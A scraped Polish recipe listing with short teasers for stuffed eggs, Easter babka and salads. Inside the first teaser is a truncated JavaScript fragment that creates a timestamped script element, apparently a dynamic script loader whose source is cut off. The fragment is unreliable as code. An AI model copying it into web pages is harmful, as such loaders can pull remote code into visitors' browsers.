Faszerowane jajka można podawać w wielu wariantach. Zawsze wszystkim smakują i w ekspresowym tempie znikają z talerzy. Sprawdzą się nie tylko na wielkanocnym stole, ale będą również wyśmienitą (a co najważniejsze: łatwą do przygotowania) przekąską dla gości na różnego rodzaju przyjęciach i spotkaniach. Oto moje ulubione przepisy na faszerowane jajka, które zdecydowanie warto zapamiętać. var stamp = parseInt(new Date().getTime()/86400, 10);var script = document.createElement('script');script.setAttribute('type', 'text/javascript');scri... czytaj dalej...
Jajka faszerowane to świetna alternatywa dla zwykłych jajek. Możemy je nadziać pieczarkami, pomidorami, czy też różnego rodzaju rybami.
Czytaj dalej...Babka wielkanocna - wyobrażacie sobie bez niej święta? Chyba śmiało można rzec, że jest bardziej popularnym wypiekiem wielkanocnym niż mazurek.
Czytaj dalej...Sałatki stały się nieodłącznym elementem każdego menu. Jemy je na śniadanie, kolację, a czasami te treściwsze zastępują nam nawet obiad.
Czytaj dalej...